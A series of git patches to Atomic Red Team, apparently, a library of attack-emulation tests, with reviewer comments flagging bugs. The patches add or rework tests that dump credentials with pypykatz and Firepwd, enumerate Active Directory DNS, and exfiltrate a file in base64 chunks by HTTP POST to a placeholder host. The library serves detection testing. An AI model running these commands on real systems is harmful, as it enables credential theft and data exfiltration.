diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 87339692e8..0b98be71d4 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -1651,6 +1651,7 @@ - T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1654 Log Enumeration](../../T1654/T1654.md) - Atomic Test #1: Get-EventLog To Enumerate Windows Security Log [windows] + - Atomic Test #2: Enumerate Windows Security Log via WevtUtil [windows] - [T1057 Process Discovery](../../T1057/T1057.md) - Atomic Test #2: Process Discovery - tasklist [windows] - Atomic Test #3: Process Discovery - Get-Process [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 3a56c2eddf..52be490327 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -97822,6 +97822,20 @@ discovery: Ignore" name: powershell elevation_required: true + - name: Enumerate Windows Security Log via WevtUtil + auto_generated_guid: fef0ace1-3550-4bf1-a075-9fea55a778dd + description: "WevtUtil is a command line tool that can be utilised by adversaries + to gather intelligence on a targeted Windows system's logging infrastructure. + \n\nBy executing this command, malicious actors can enumerate all available + event logs, including both default logs such as Application, Security, and + System\nas well as any custom logs created by administrators. \n\nThis information + provides valuable insight into the system's logging mechanisms, potentially + allowing attackers to identify gaps or weaknesses in the logging configuration" + supported_platforms: + - windows + executor: + command: wevtutil enum-logs + name: command_prompt T1087.004: technique: x_mitre_platforms: diff --git a/atomics/Indexes/windows-index.yaml b/atomics/Indexes/windows-index.yaml index 00c4225656..f662d099ab 100644 
--- a/atomics/Indexes/windows-index.yaml +++ b/atomics/Indexes/windows-index.yaml @@ -79723,6 +79723,20 @@ discovery: Ignore" name: powershell elevation_required: true + - name: Enumerate Windows Security Log via WevtUtil + auto_generated_guid: fef0ace1-3550-4bf1-a075-9fea55a778dd + description: "WevtUtil is a command line tool that can be utilised by adversaries + to gather intelligence on a targeted Windows system's logging infrastructure. + \n\nBy executing this command, malicious actors can enumerate all available + event logs, including both default logs such as Application, Security, and + System\nas well as any custom logs created by administrators. \n\nThis information + provides valuable insight into the system's logging mechanisms, potentially + allowing attackers to identify gaps or weaknesses in the logging configuration" + supported_platforms: + - windows + executor: + command: wevtutil enum-logs + name: command_prompt T1087.004: technique: x_mitre_platforms: diff --git a/atomics/T1654/T1654.md b/atomics/T1654/T1654.md index 44a7cfabe5..da649736ad 100644 --- a/atomics/T1654/T1654.md +++ b/atomics/T1654/T1654.md @@ -10,6 +10,8 @@ Adversaries may also target centralized logging infrastructure such as SIEMs. Lo - [Atomic Test #1 - Get-EventLog To Enumerate Windows Security Log](#atomic-test-1---get-eventlog-to-enumerate-windows-security-log) +- [Atomic Test #2 - Enumerate Windows Security Log via WevtUtil](#atomic-test-2---enumerate-windows-security-log-via-wevtutil) +
@@ -47,4 +49,37 @@ powershell -c "remove-item $env:temp\T1654_events.txt -ErrorAction Ignore" +
+
+ +## Atomic Test #2 - Enumerate Windows Security Log via WevtUtil +WevtUtil is a command line tool that can be utilised by adversaries to gather intelligence on a targeted Windows system's logging infrastructure. + +By executing this command, malicious actors can enumerate all available event logs, including both default logs such as Application, Security, and System +as well as any custom logs created by administrators. + +This information provides valuable insight into the system's logging mechanisms, potentially allowing attackers to identify gaps or weaknesses in the logging configuration + +**Supported Platforms:** Windows + + +**auto_generated_guid:** fef0ace1-3550-4bf1-a075-9fea55a778dd + + + + + + +#### Attack Commands: Run with `command_prompt`! + + +```cmd +wevtutil enum-logs +``` + + + + + +
From edea9065484b174ad2a327b784092739f333694d Mon Sep 17 00:00:00 2001 From: Jake H Date: Mon, 26 Feb 2024 15:19:26 +0000 Subject: [PATCH 35/41] Implementation of venv into Windows Python atomics (#2703) * Improve pip handling (#1) * virtual env added to T1018, tested and confirmed working * virtual env added to T1003.001, tested and confirmed working * virtual env added to T1555.003, tested and confirmed working * Removing pip-autoremove installation as not required * updating atomics count in README.md [ci skip] --------- Co-authored-by: Hare Sudhan Co-authored-by: Carrie Roberts Co-authored-by: publish bot --- README.md | 2 +- atomics/T1003.001/T1003.001.yaml | 35 +++++++++++++------------ atomics/T1003.002/T1003.002.yaml | 34 ++++++++++++++---------- atomics/T1018/T1018.yaml | 24 ++++++++--------- atomics/T1046/T1046.yaml | 2 +- atomics/T1059.006/T1059.006.yaml | 1 + atomics/T1555.003/T1555.003.yaml | 45 +++++++++++++++----------------- 7 files changed, 75 insertions(+), 68 deletions(-) diff --git a/README.md b/README.md index 38fbbff467..890a3f7090 100644 --- a/README.md +++ b/README.md @@ -2,7 +2,7 @@ # Atomic Red Team -![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1521-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master) +![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1522-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master) Atomic Red Team™ is a library of tests mapped to the [MITRE ATT&CK®](https://attack.mitre.org/) framework. Security teams can use 
diff --git a/atomics/T1003.001/T1003.001.yaml b/atomics/T1003.001/T1003.001.yaml index 8ade357833..5b92a022cd 100644 --- a/atomics/T1003.001/T1003.001.yaml +++ b/atomics/T1003.001/T1003.001.yaml 
@@ -186,40 +186,43 @@ atomic_tests: Python 3 must be installed, use the get_prereq_command's to meet the prerequisites for this test. Successful execution of this test will display multiple usernames and passwords/hashes to the screen. + + Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution. + supported_platforms: - windows - dependency_executor_name: command_prompt + input_arguments: + venv_path: + description: Path to the folder for the tactics venv + type: string + default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1003_001 + dependency_executor_name: powershell dependencies: - description: | Computer must have python 3 installed prereq_command: | - py -3 --version >nul 2>&1 - exit /b %errorlevel% + if (Get-Command py -errorAction SilentlyContinue) { exit 0 } else { exit 1 } get_prereq_command: | New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait - description: | - Computer must have pip installed + Computer must have venv configured at #{venv_path} prereq_command: | - py -3 -m pip --version >nul 2>&1 - exit /b %errorlevel% + if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit 1 } get_prereq_command: | - New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null - invoke-webrequest "https://bootstrap.pypa.io/ez_setup.py" -outfile "PathToAtomicsFolder\..\ExternalPayloads\ez_setup.py" - invoke-webrequest "https://bootstrap.pypa.io/get-pip.py" -outfile "PathToAtomicsFolder\..\ExternalPayloads\get-pip.py" - cmd /c "PathToAtomicsFolder\..\ExternalPayloads\ez_setup.py" - cmd /c 
"PathToAtomicsFolder\..\ExternalPayloads\get-pip.py" + py -m venv "#{venv_path}" - description: | - pypykatz must be installed and part of PATH + pypykatz must be installed prereq_command: | - pypykatz -h >nul 2>&1 - exit /b %errorlevel% + if (Get-Command "#{venv_path}\Scripts\pypykatz" -errorAction SilentlyContinue) { exit 0 } else { exit 1 } get_prereq_command: | - pip install pypykatz + & "#{venv_path}\Scripts\pip.exe" install --no-cache-dir pypykatz 2>&1 | Out-Null executor: command: | - pypykatz live lsa + "#{venv_path}\Scripts\pypykatz" live lsa + cleanup_command: | + del "%temp%\nanodump.dmp" > nul 2> nul name: command_prompt elevation_required: true - name: Dump LSASS.exe Memory using Out-Minidump.ps1 diff --git a/atomics/T1003.002/T1003.002.yaml b/atomics/T1003.002/T1003.002.yaml index 406889a564..5b7ea97079 100644 --- a/atomics/T1003.002/T1003.002.yaml +++ b/atomics/T1003.002/T1003.002.yaml 
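Review bot: The added `cleanup_command` deletes `%temp%\nanodump.dmp`, which nothing in this test's visible commands creates; the executor only runs `"#{venv_path}\Scripts\pypykatz" live lsa`, so the line looks carried over from another atomic. Meanwhile the venv that the new description says must be deleted by hand is left on disk. If cleanup is wanted here it should target what this test creates, for example `rmdir /s /q "#{venv_path}"`; otherwise drop the block. The new `get_prereq_command` installs whatever pypykatz release is current on PyPI for a test marked `elevation_required: true`; pinning it, as in `& "#{venv_path}\Scripts\pip.exe" install --no-cache-dir pypykatz==<PINNED_VERSION> 2>&1 | Out-Null`, keeps runs reproducible and narrows the supply-chain exposure. The Python prerequisite now passes whenever a `py` launcher exists, whereas the removed `py -3 --version` confirmed a Python 3 interpreter; `py -3 -m venv "#{venv_path}"` would keep that guarantee.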
@@ -25,35 +25,41 @@ atomic_tests: - name: Registry parse with pypykatz auto_generated_guid: a96872b2-cbf3-46cf-8eb4-27e8c0e85263 description: | - Parses registry hives to obtain stored credentials + Parses registry hives to obtain stored credentials. + + Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution. supported_platforms: - windows - dependency_executor_name: command_prompt + input_arguments: + venv_path: + description: Path to the folder for the tactics venv + type: string + default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1003_002 + dependency_executor_name: powershell dependencies: - description: | Computer must have python 3 installed prereq_command: | - py -3 --version >nul 2>&1 - exit /b %errorlevel% + if (Get-Command py -errorAction SilentlyContinue) { exit 0 } else { exit 1 } get_prereq_command: | - echo "Python 3 must be installed manually" + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null + invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" + Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait - description: | - Computer must have pip installed + Computer must have venv configured at #{venv_path} prereq_command: | - py -3 -m pip --version >nul 2>&1 - exit /b %errorlevel% + if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit 1 } get_prereq_command: | - echo "PIP must be installed manually" + py -m venv "#{venv_path}" - description: | - pypykatz must be installed and part of PATH + pypykatz must be installed prereq_command: | - pypykatz -h >nul 2>&1 - exit /b %errorlevel% + if (Get-Command "#{venv_path}\Scripts\pypykatz" -errorAction SilentlyContinue) { exit 0 } else { exit 1 } get_prereq_command: | - pip 
install pypykatz + & "#{venv_path}\Scripts\pip.exe" install --no-cache-dir pypykatz 2>&1 | Out-Null executor: command: | - pypykatz live registry + "#{venv_path}\Scripts\pypykatz" live lsa name: command_prompt elevation_required: true - name: esentutl.exe SAM copy diff --git a/atomics/T1018/T1018.yaml b/atomics/T1018/T1018.yaml index dc09fa60f8..b7786b298b 100644 --- a/atomics/T1018/T1018.yaml +++ b/atomics/T1018/T1018.yaml 
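Review bot: The executor command changed from `pypykatz live registry` to `"#{venv_path}\Scripts\pypykatz" live lsa`, which no longer matches this test's name (Registry parse with pypykatz) or its description of parsing registry hives. As written the test reads LSASS instead, duplicating the T1003.001 atomic, so anyone validating T1003.002 detections with it gets telemetry for the wrong technique. The line should keep the original subcommand: `"#{venv_path}\Scripts\pypykatz" live registry`.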
@@ -166,35 +166,35 @@ atomic_tests: description: hostname or ip address to connect to. type: string default: "192.168.1.1" + venv_path: + description: Path to the folder for the tactics venv + type: string + default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1018 dependency_executor_name: powershell dependencies: - description: | Computer must have python 3 installed prereq_command: | - if (python --version) {exit 0} else {exit 1} + if (Get-Command py -errorAction SilentlyContinue) { exit 0 } else { exit 1 } get_prereq_command: | New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait - description: | - Computer must have pip installed + Computer must have venv configured at #{venv_path} prereq_command: | - if (pip3 -V) {exit 0} else {exit 1} + if (Test-Path -Path "#{venv_path}" ) { exit 0 } else { exit 1 } get_prereq_command: | - New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null - invoke-webrequest "https://bootstrap.pypa.io/ez_setup.py" -outfile "PathToAtomicsFolder\..\ExternalPayloads\ez_setup.py" - invoke-webrequest "https://bootstrap.pypa.io/get-pip.py" -outfile "PathToAtomicsFolder\..\ExternalPayloads\get-pip.py" - cmd /c "PathToAtomicsFolder\..\ExternalPayloads\ez_setup.py" - cmd /c "PathToAtomicsFolder\..\ExternalPayloads\get-pip.py" + py -m venv "#{venv_path}" - description: | - adidnsdump must be installed and part of PATH + adidnsdump must be installed prereq_command: | - if (cmd /c adidnsdump -h) {exit 0} else {exit 1} + if (Get-Command "#{venv_path}\Scripts\adidnsdump" -errorAction SilentlyContinue) { exit 0 } else { exit 1 } 
get_prereq_command: | - pip3 install adidnsdump + & "#{venv_path}\Scripts\pip.exe" install --no-cache-dir adidnsdump 2>&1 | Out-Null executor: command: | - adidnsdump -u #{user_name} -p #{acct_pass} --print-zones #{host_name} + "#{venv_path}\Scripts\adidnsdump" -u #{user_name} -p #{acct_pass} --print-zones #{host_name} name: command_prompt elevation_required: true - name: Adfind - Enumerate Active Directory Computer Objects diff --git a/atomics/T1046/T1046.yaml b/atomics/T1046/T1046.yaml index f3e32093a7..6633b73f41 100644 --- a/atomics/T1046/T1046.yaml +++ b/atomics/T1046/T1046.yaml @@ -115,7 +115,7 @@ atomic_tests: - description: | Check if python exists on the machine prereq_command: | - if (python --version) {exit 0} else {exit 1} + if (Get-Command py -errorAction SilentlyContinue) { exit 0 } else { exit 1 } get_prereq_command: | New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" diff --git a/atomics/T1059.006/T1059.006.yaml b/atomics/T1059.006/T1059.006.yaml index 14b8c5c9cc..cf447b8d48 100644 --- a/atomics/T1059.006/T1059.006.yaml +++ b/atomics/T1059.006/T1059.006.yaml @@ -38,6 +38,7 @@ atomic_tests: name: sh cleanup_command: | rm #{payload_file_name} + pip-autoremove pypykatz >nul 2> nul - name: 'Execute Python via scripts' auto_generated_guid: 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8 description: Create Python file (.py) that downloads and executes shell script via executor arguments diff --git a/atomics/T1555.003/T1555.003.yaml b/atomics/T1555.003/T1555.003.yaml index 9b18849792..0f8976d1ab 100644 --- a/atomics/T1555.003/T1555.003.yaml +++ b/atomics/T1555.003/T1555.003.yaml 
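Review bot: The new install line `& "#{venv_path}\Scripts\pip.exe" install --no-cache-dir adidnsdump 2>&1 | Out-Null` installs an unpinned package and discards all of pip's output; the same pattern is used for pypykatz in the T1003.001 and T1003.002 hunks. The executor then runs that package with `elevation_required: true`, so whatever version the index serves that day is executed elevated, and a failed install surfaces only as a failed prereq re-check with no error text. Pinning the version and keeping the error stream would address both, e.g. `& "#{venv_path}\Scripts\pip.exe" install --no-cache-dir "adidnsdump==<PINNED_VERSION>"` (placeholder; the page gives no version).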
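Review bot: The T1046 prereq check now looks for the `py` launcher where it used to run `python --version`, but the test's executor command lies outside this hunk, so it is not visible which binary the test actually calls. If the executor still invokes `python`, the check can pass on a host where `python` is not on PATH and the test then fails at run time instead of at the prereq stage. The check should name the same binary as the command; if that is `python`, the line would be `if (Get-Command python -errorAction SilentlyContinue) { exit 0 } else { exit 1 }`.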
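Review bot: The added cleanup line `pip-autoremove pypykatz >nul 2> nul` uses cmd.exe redirection in a block whose executor is `name: sh`; in a POSIX shell `nul` is an ordinary filename, so this writes a file called `nul` into the working directory instead of discarding output. It should read `pip-autoremove pypykatz >/dev/null 2>&1`. Nothing in this hunk shows the test installing `pip-autoremove` or pypykatz, so the line may simply fail quietly on every run; the test body starts above the hunk.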
@@ -200,13 +200,15 @@ atomic_tests: description: | Firepwd.py is a script that can decrypt Mozilla (Thunderbird, Firefox) passwords. Upon successful execution, the decrypted credentials will be output to a text file, as well as displayed on screen. + + Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution. supported_platforms: - windows input_arguments: Firepwd_Path: description: Filepath for Firepwd.py type: string - default: PathToAtomicsFolder\..\ExternalPayloads\Firepwd.py + default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1555.004\Scripts\Firepwd.py Out_Filepath: description: Filepath to output results to type: string @@ -219,15 +221,12 @@ atomic_tests: description: Filepath to python type: string default: C:\Program Files\Python310\python.exe + venv_path: + description: Path to the folder for the tactics venv + type: string + default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1555.004 dependency_executor_name: powershell dependencies: - - description: | - Firepwd must exist at #{Firepwd_Path} - prereq_command: | - if (Test-Path "#{Firepwd_Path}") {exit 0} else {exit 1} - get_prereq_command: | - New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null - Invoke-WebRequest "https://raw.githubusercontent.com/lclevy/firepwd/167eabf3b88d5a7ba8b8bc427283f827b6885982/firepwd.py" -outfile "#{Firepwd_Path}" - description: | Firefox profile directory must be present prereq_command: | 
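Review bot: The new `Firepwd_Path` default hard-codes a folder named `venv_t1555.004` although this file is T1555.003, and the `venv_path` default added in the next hunk repeats the same literal. Because the two defaults are independent strings, overriding `venv_path` alone leaves `Firepwd_Path` pointing into a `Scripts` folder that the venv step may never create, and the download to `#{Firepwd_Path}` would then presumably fail. If `.004` is a typo, both defaults should change together: `default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1555.003\Scripts\Firepwd.py` and `default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1555.003`.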
@@ -257,37 +256,35 @@ atomic_tests: invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait - description: | - Pip must be installed. + Computer must have venv configured at #{venv_path} prereq_command: | - $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User")) - if (pip -v) {exit 0} else {exit 1} + if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit 1 } + get_prereq_command: | + py -m venv "#{venv_path}" + - description: | + Firepwd must exist at #{Firepwd_Path} + prereq_command: | + if (Test-Path "#{Firepwd_Path}") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null - invoke-webrequest "https://bootstrap.pypa.io/ez_setup.py" -outfile "PathToAtomicsFolder\..\ExternalPayloads\ez_setup.py" - invoke-webrequest "https://bootstrap.pypa.io/get-pip.py" -outfile "PathToAtomicsFolder\..\ExternalPayloads\get-pip.py" - cmd /c "PathToAtomicsFolder\..\ExternalPayloads\ez_setup.py" - cmd /c "PathToAtomicsFolder\..\ExternalPayloads\get-pip.py" + Invoke-WebRequest "https://raw.githubusercontent.com/lclevy/firepwd/167eabf3b88d5a7ba8b8bc427283f827b6885982/firepwd.py" -outfile "#{Firepwd_Path}" - description: | Pycryptodome library must be installed prereq_command: | - $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User")) - if (pip show pycryptodome) {exit 0} else {exit 1} + if (#{venv_path}\Scripts\pip.exe show pycryptodome) {exit 0} else {exit 1} 
get_prereq_command: | - $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User")) - if (test-path "#{VS_CMD_Path}"){pip install pycryptodome | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null} else {write-host "Visual Studio Build Tools (C++ Support) must be installed to continue gathering this prereq"} + if (test-path "#{VS_CMD_Path}"){#{venv_path}\Scripts\pip.exe install pycryptodome | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null} else {write-host "Visual Studio Build Tools (C++ Support) must be installed to continue gathering this prereq"} - description: | Pyasn1 library must be installed prereq_command: | - $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User")) - if (pip show pyasn1) {exit 0} else {exit 1} + if (#{venv_path}\Scripts\pip.exe show pyasn1) {exit 0} else {exit 1} get_prereq_command: | - $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User")) - if (test-path "#{VS_CMD_Path}"){pip install pyasn1 | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null} else {write-host "Visual Studio Build Tools (C++ Support) must be installed to continue gathering this prereq."} + if (test-path "#{VS_CMD_Path}") & {#{venv_path}\Scripts\pip.exe install pyasn1 | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null} else {write-host "Visual Studio Build Tools (C++ Support) must be installed to continue gathering this prereq."} executor: name: powershell command: | $PasswordDBLocation = get-childitem -path "$env:appdata\Mozilla\Firefox\Profiles\*.default-release\" - cmd /c #{Firepwd_Path} -d $PasswordDBLocation > #{Out_Filepath} + cmd 
/c #{venv_path}\Scripts\python.exe #{Firepwd_Path} -d $PasswordDBLocation > #{Out_Filepath} cat #{Out_Filepath} cleanup_command: | Remove-Item -Path "#{Out_Filepath}" -erroraction silentlycontinue From b16650761432417386e32c2a49d3f1c8324b9da4 Mon Sep 17 00:00:00 2001 From: sai prashanth pulisetti <40313110+prashanthpulisetti@users.noreply.github.com> Date: Mon, 26 Feb 2024 20:53:55 +0530 Subject: [PATCH 36/41] Update T1030.yaml Network-Based Data Transfer in Small Chunks (#2658) * Update T1030.yaml Network-Based Data Transfer in Small Chunks # Atomic Test # - T1030 - Data Transfer Size Limits: Network-Based Data Transfer in Small Chunks ## Objective Simulate the technique of transferring data over a network in small chunks to evade size-based detection mechanisms. ## Description This test involves transferring data over a network (either to a controlled external endpoint like `example.com`) in small, segmented sizes. This simulates an adversary's behavior in conducting stealthy data exfiltration. * Update T1030.yaml * Update T1030.yaml removed clean up commands and detection * Update T1030.yaml * Update T1030.yaml updated guid * Update T1030.yaml * Update T1030.yaml updated intendents * Update T1030.yaml --------- Co-authored-by: Hare Sudhan Co-authored-by: Carrie Roberts --- atomics/T1030/T1030.yaml | 32 ++++++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) diff --git a/atomics/T1030/T1030.yaml b/atomics/T1030/T1030.yaml index 1497fb077a..50e2aa617a 100644 --- a/atomics/T1030/T1030.yaml +++ b/atomics/T1030/T1030.yaml 
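Review bot: In the Pyasn1 `get_prereq_command` the new line reads `if (test-path "#{VS_CMD_Path}") & {...} else {...}`; PowerShell requires the statement block directly after the condition, so the stray `&` makes the line a parse error and this prereq can never be installed. The Pycryptodome line just above has the intended shape. The call operator belongs inside the block, and quoting the path keeps it working when `#{venv_path}` contains spaces: `if (test-path "#{VS_CMD_Path}") {& "#{venv_path}\Scripts\pip.exe" install pyasn1 | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null} else {...}`, with the else branch unchanged. The same unquoted `#{venv_path}\Scripts\pip.exe` appears in the two `pip.exe show` checks and in the pycryptodome install.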
@@ -31,3 +31,35 @@ atomic_tests: cleanup_command: | if [ -f #{folder_path}/safe_to_delete ]; then rm -rf #{folder_path}; fi; name: sh + +- name: Network-Based Data Transfer in Small Chunks + auto_generated_guid: "8ce53049-5314-4279-b635-b69c5bed3a36" + description: "Simulate transferring data over a network in small chunks to evade detection." + supported_platforms: + - "windows" + input_arguments: + source_file_path: + description: "Path to the source file to transfer." + type: path + default: "[User specified]" + destination_url: + description: "URL of the destination server." + type: url + default: "http://example.com" + chunk_size: + description: "Size of each data chunk (in KB)." + type: integer + default: 1024 + executor: + name: powershell + elevation_required: false + command: | + $file = [System.IO.File]::OpenRead(#{source_file_path}) + $chunkSize = #{chunk_size} * 1KB + $buffer = New-Object Byte[] $chunkSize + + while ($bytesRead = $file.Read($buffer, 0, $buffer.Length)) { + $encodedChunk = [Convert]::ToBase64String($buffer, 0, $bytesRead) + Invoke-WebRequest -Uri #{destination_url} -Method Post -Body $encodedChunk + } + $file.Close() From c09d2a3748047c44796ce3028e7f56a3bdfb6ba0 Mon Sep 17 00:00:00 2001 From: Atomic Red Team GUID generator Date: Mon, 26 Feb 2024 15:24:32 +0000 Subject: [PATCH 37/41] Generate GUIDs from job=generate-docs branch=master [skip ci] --- atomics/T1030/T1030.yaml | 2 +- atomics/used_guids.txt | 2 ++ 2 files changed, 3 insertions(+), 1 deletion(-) diff --git a/atomics/T1030/T1030.yaml b/atomics/T1030/T1030.yaml index 50e2aa617a..02989e8dda 100644 --- a/atomics/T1030/T1030.yaml +++ b/atomics/T1030/T1030.yaml 
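Review bot: `[System.IO.File]::OpenRead(#{source_file_path})` substitutes the path without quotes, so PowerShell parses the value as an expression rather than a string; with the default `[User specified]`, or an ordinary Windows path, the command fails before anything is read. The argument should be quoted, `$file = [System.IO.File]::OpenRead("#{source_file_path}")`, and likewise `-Uri "#{destination_url}"`. `$file.Close()` may never be reached if a request throws, so the loop is better wrapped as `try { ... } finally { $file.Close() }`. Because the test posts real file contents over plain HTTP to the configured URL, the description should tell operators to point `source_file_path` at a dummy file and `destination_url` at a host they control.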
@@ -33,7 +33,7 @@ atomic_tests: name: sh - name: Network-Based Data Transfer in Small Chunks - auto_generated_guid: "8ce53049-5314-4279-b635-b69c5bed3a36" + auto_generated_guid: f0287b58-f4bc-40f6-87eb-692e126e7f8f description: "Simulate transferring data over a network in small chunks to evade detection." supported_platforms: - "windows" diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index a01fb1e73e..63fdad212e 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -1568,3 +1568,5 @@ ed6c2c87-bba6-4a28-ac6e-c8af3d6c2ab5 36c62584-d360-41d6-886f-d194654be7c2 bac8a340-be64-4491-a0cc-0985cb227f5a fef0ace1-3550-4bf1-a075-9fea55a778dd +8ce53049-5314-4279-b635-b69c5bed3a36 +f0287b58-f4bc-40f6-87eb-692e126e7f8f From e9b9f2ed7bbc8e0591ae942abfef08e55499ab89 Mon Sep 17 00:00:00 2001 From: Atomic Red Team doc generator Date: Mon, 26 Feb 2024 15:24:49 +0000 Subject: [PATCH 38/41] Generated docs from job=generate-docs branch=master [ci skip] --- .../art-navigator-layer-windows.json | 2 +- .../art-navigator-layer.json | 2 +- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 3 +- atomics/Indexes/Matrices/windows-matrix.md | 2 +- atomics/Indexes/index.yaml | 239 +++++++++++------- atomics/Indexes/linux-index.yaml | 3 +- atomics/Indexes/windows-index.yaml | 238 ++++++++++------- atomics/T1003.001/T1003.001.md | 48 ++-- atomics/T1003.002/T1003.002.md | 46 ++-- atomics/T1018/T1018.md | 21 +- atomics/T1030/T1030.md | 45 ++++ atomics/T1046/T1046.md | 2 +- atomics/T1059.006/T1059.006.md | 3 +- atomics/T1555.003/T1555.003.md | 50 ++-- 17 files changed, 448 insertions(+), 259 deletions(-) diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json index f74835998c..44f72725b3 100644 
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json 
@@ -1 +1 @@ -{"name":"Atomic Red Team (Windows)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{"platforms":["Windows"]},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":40,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}],"comment":"\n- Gsecdump\n- Credential Dumping with NPPSpy\n- Dump svchost.exe to gather RDP credentials\n- Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)\n- Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)\n- Dump Credential Manager using keymgr.dll and rundll32.exe\n"},{"techniqueID":"T1003.001","score":14,"enabled":true,"comment":"\n- Dump LSASS.exe Memory using 